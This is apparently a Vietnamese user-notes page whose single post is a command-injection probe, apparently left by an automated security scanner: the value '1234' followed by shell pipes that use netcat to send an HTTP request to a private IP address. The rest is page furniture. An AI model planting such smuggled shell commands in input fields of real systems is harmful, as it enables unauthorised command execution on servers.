Avatar's lol_ahihi

Ghi chép của lol_ahihi

1234"|echo -e "GET /AppScanMsg.html?varId=1591 HTTP/1.0 " | nc 192.168.40.46 10002|echo "

1234
1060 ngày trước · Bình luận · Loan tin ·  
Website liên kết